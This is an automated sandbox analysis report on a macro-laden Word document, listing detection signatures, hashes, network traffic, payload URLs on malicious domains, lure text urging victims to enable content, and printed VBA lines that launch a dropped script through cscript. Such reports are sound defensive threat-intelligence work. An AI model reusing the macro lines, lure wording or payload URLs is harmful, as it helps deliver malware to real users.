Windows Analysis Report sample.doc.vir

Overview

General Information

Sample Name: sample.doc.vir (renamed file extension from vir to doc)
Analysis ID: 528758
MD5: 6be56f977b6692fb6ce5f94e110664e3
SHA1: f4d5ce35c656e0f156a2ced453a964faabef09fb
SHA256: ae94cd20505f914bba5e612acb80c429c5606a739c0838e3a5f87bfcc7cc8519
Tags: docxvir

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected MalDoc
Multi AV Scanner detection for submitted file
Sigma detected: Office product drops script at suspicious location
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Yara detected Powershell download and execute
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Document contains OLE streams with names of living off the land binaries
Sigma detected: Change PowerShell Policies to a Unsecure Level
Document contains an embedded VBA with base64 encoded strings
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded macro with GUI obfuscation
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Contains functionality to detect virtual machines (SLDT)
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: sample.doc.doc Virustotal: Detection: 50%
Source: sample.doc.doc ReversingLabs: Detection: 60%
Antivirus / Scanner detection for submitted sample
Source: sample.doc.doc Avira: detected
Multi AV Scanner detection for domain / URL
Source: ghapan.com Virustotal: Detection: 8%
Source: yoowi.net Virustotal: Detection: 8%
Source: chaturanga.groopy.com Virustotal: Detection: 8%
Source: gruasingenieria.pe Virustotal: Detection: 7%

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 136.243.74.161:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.185.17.114:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown HTTPS traffic detected: 210.211.111.87:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown HTTPS traffic detected: 143.95.80.83:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: :ystem.pdb& source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBBw source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdby source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cscript.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: ghapan.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 136.243.74.161:443
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 136.243.74.161:443

Networking:

Yara detected MalDoc
Source: Yara match File source: sample.doc.doc, type: SAMPLE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP, type: DROPPED
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE
Source: Joe Sandbox View ASN Name: ASMALLORANGE1US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /Kdg73onC3oQ/090921.html HTTP/1.1Host: ghapan.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: ghapan.com
Source: global traffic HTTP traffic detected: GET /LUS1NTVui6/090921.html HTTP/1.1Host: gruasingenieria.peConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /tDzEJ8uVGwdj/130921.html HTTP/1.1Host: yoowi.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /7SEZBnhMLW/130921.html HTTP/1.1Host: chaturanga.groopy.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: chaturanga.groopy.com
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 136.243.74.161
Source: Joe Sandbox View IP Address: 143.95.80.83
Source: Joe Sandbox View IP Address: 192.185.17.114
Source: Joe Sandbox View IP Address: 210.211.111.87
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 136.243.74.161:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.185.17.114:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown HTTPS traffic detected: 210.211.111.87:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown HTTPS traffic detected: 143.95.80.83:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 17:39:46 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Apr 2019 06:20:01 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/html
Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: cscript.exe, 00000001.00000002.474455251.0000000003CB0000.00000002.00020000.sdmp, powershell.exe, 00000003.00000002.480445007.0000000002450000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: cscript.exe, 00000001.00000002.474013786.0000000001D00000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: cscript.exe, 00000001.00000002.474455251.0000000003CB0000.00000002.00020000.sdmp, powershell.exe, 00000003.00000002.480445007.0000000002450000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000011.00000002.490483837.0000000001B20000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://chaturanga.groopy.com
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://chaturanga.groopy.com/
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp String found in binary or memory: https://chaturanga.groopy.com/7S
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://chaturanga.groopy.com/7SEZBnhMLW/130921.html
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp String found in binary or memory: https://chaturanga.groopy.com/7SEZBnhMLW/130921.htmlPE
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp String found in binary or memory: https://chaturanga.groopy.com/cgi-sys/suspendedpage.cgi
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp String found in binary or memory: https://chaturanga.groopy.comp
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://ghapan.c
Source: powershell.exe, 00000003.00000002.489114799.0000000003865000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://ghapan.com
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://ghapan.com/Kdg73onC3o
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://ghapan.com/Kdg73onC3oQ
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://ghapan.com/Kdg73onC3oQ/0
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://ghapan.com/Kdg73onC3oQ/090921.html
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://ghapan.com/Kdg73onC3oQ/090921.htmlPE
Source: powershell.exe, 00000003.00000002.489124422.000000000386C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.489114799.0000000003865000.00000004.00000001.sdmp String found in binary or memory: https://ghapan.com/cgi-sys/suspendedpage.cgi
Source: powershell.exe, 00000003.00000002.489124422.000000000386C000.00000004.00000001.sdmp String found in binary or memory: https://ghapan.comp
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp String found in binary or memory: https://gruasingenieria.pe
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://gruasingenieria.pe/LU
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://gruasingenieria.pe/LUS
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp String found in binary or memory: https://gruasingenieria.pe/LUS1N
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://gruasingenieria.pe/LUS1NTVui6/090921.html
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp String found in binary or memory: https://gruasingenieria.pe/LUS1NTVui6/090921.htmlPE
Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmp String found in binary or memory: https://lotolands.com
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://lotolands.com/JtaTAt4
Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://lotolands.com/JtaTAt4E
Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmp String found in binary or memory: https://lotolands.com/JtaTAt4Ej/
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://lotolands.com/JtaTAt4Ej/130921.html
Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmp String found in binary or memory: https://lotolands.com/JtaTAt4Ej/130921.htmlPE
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp String found in binary or memory: https://yoowi.ne
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp String found in binary or memory: https://yoowi.net
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://yoowi.net/tDzEJ8uVGwd
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp String found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/1
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp String found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/130921.html
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp String found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/130921.htmlPE
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEA04FE6-8D47-46DE-880E-C9FDF00950BC}.tmp
Source: unknown DNS traffic detected: queries for: ghapan.com
Source: global traffic HTTP traffic detected: GET /Kdg73onC3oQ/090921.html HTTP/1.1Host: ghapan.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: ghapan.com
Source: global traffic HTTP traffic detected: GET /LUS1NTVui6/090921.html HTTP/1.1Host: gruasingenieria.peConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /tDzEJ8uVGwdj/130921.html HTTP/1.1Host: yoowi.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /7SEZBnhMLW/130921.html HTTP/1.1Host: chaturanga.groopy.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: chaturanga.groopy.com

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" 0 Page, I of I Words
Source: Screenshot number: 4 Screenshot OCR: Enable content" 0 Page, I of I Words: 0 N@m 13 ;a 10096 G) FI G) ,, . I lm=lk E ' 0
Source: Screenshot number: 8 Screenshot OCR: Enable content" Ru 71)11 qllnn|| n$m RunDLL m" RunDLL ,0 There was a problem starting C:\Progr
Source: Document image extraction number: 0 Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
Source: Document image extraction number: 0 Screenshot OCR: Enable content"
Source: Document image extraction number: 1 Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
Source: Document image extraction number: 1 Screenshot OCR: Enable content"
Source: Screenshot number: 12 Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" RunDLL |~| ,:Q, There was
Source: Screenshot number: 12 Screenshot OCR: Enable content" RunDLL |~| ,:Q, There was a problem starting C:\ProgramOata\www1.dll " C:\Program
Document contains an embedded VBA macro which may execute processes
Source: sample.doc.doc OLE, VBA macro line: h11.Run "cscript.exe %appdata%\www.txt //E:VBScript //NoLogo " + "%~f0" + " %*", Chr(48)
Source: VBA code instrumentation OLE, VBA macro: Module Module3, Function eFile, API IWshShell3.Run("cscript.exe %appdata%\www.txt //E:VBScript //NoLogo %~f0 %*","0") Name: eFile
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
Document contains OLE streams with names of living off the land binaries
Source: sample.doc.doc Stream path 'Macros/deutsche/o' : [binary stream data: "Tahoma" font name strings followed by a JFIF/Exif image header; raw bytes omitted]
Source: ~DF77272A7F6F18B150.TMP.0.dr Stream path 'deutsche/o' : [binary stream data: "Tahoma" font name strings followed by a JFIF/Exif image header; raw bytes omitted]
Source: ~DF26415DDA42946BBE.TMP.0.dr Stream path 'o' : [binary stream data: "Tahoma" font name strings followed by a JFIF/Exif image header; raw bytes omitted]
.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(........cK.Y....(x...kG.{2H.=....}=.-...H.3..X..u.V......!.q5...X.....:.z)s^Vm.9....R..V....kGn..]O_(..%.+*..8.....$.W..w..J.........Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@...QA.P../../..............6.....{|...H..+....................W.1y$....>..P? ..V...s-...h..-...m].........fUq..lMW{.......~:..Q^....Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@.6X....A..._.'...w.B.........57.v.3.}.........x....b.......8..E.3......K......@..v....W...X.......iv.JV^I.<........J.....M..m_.....QE|...E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P...._.-^7....R....k..../...........\..W.V.....W....w..O.?...Q]G(QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE........J..?..o....~........J..?..o....
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentation OLE, VBA macro: Module Module3, Function eFile, String ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
Document contains an embedded VBA macro with suspicious strings
Source: sample.doc.doc OLE, VBA macro line: RO = Environ("USERPROFILE") & "\AppData\Roaming\"
Source: VBA code instrumentation OLE, VBA macro: Module Module3, Function eFile, String environ: RO = Environ("USERPROFILE") & "\AppData\Roaming\" Name: eFile
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Private Function JbxHook_Environ_1_(jbxline, ByRef jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: Static jbxtresh_Environ As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Environ < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxLog "api:" & jbxline & ":Environ"
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxHook_Environ_1_ = Environ(jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: If jbxtresh_Environ < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: jbxtresh_Environ = jbxtresh_Environ + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Environ_1_
Source: ~DF77272A7F6F18B150.TMP.0.dr OLE, VBA macro line: RO = JbxHook_Environ_1_(20, "USERPROFILE") & "\AppData\Roaming\"
Document contains an embedded macro with GUI obfuscation
Source: sample.doc.doc Stream path 'Macros/deutsche/o' : Found suspicious string wscript.shell in non macro stream
Yara signature match
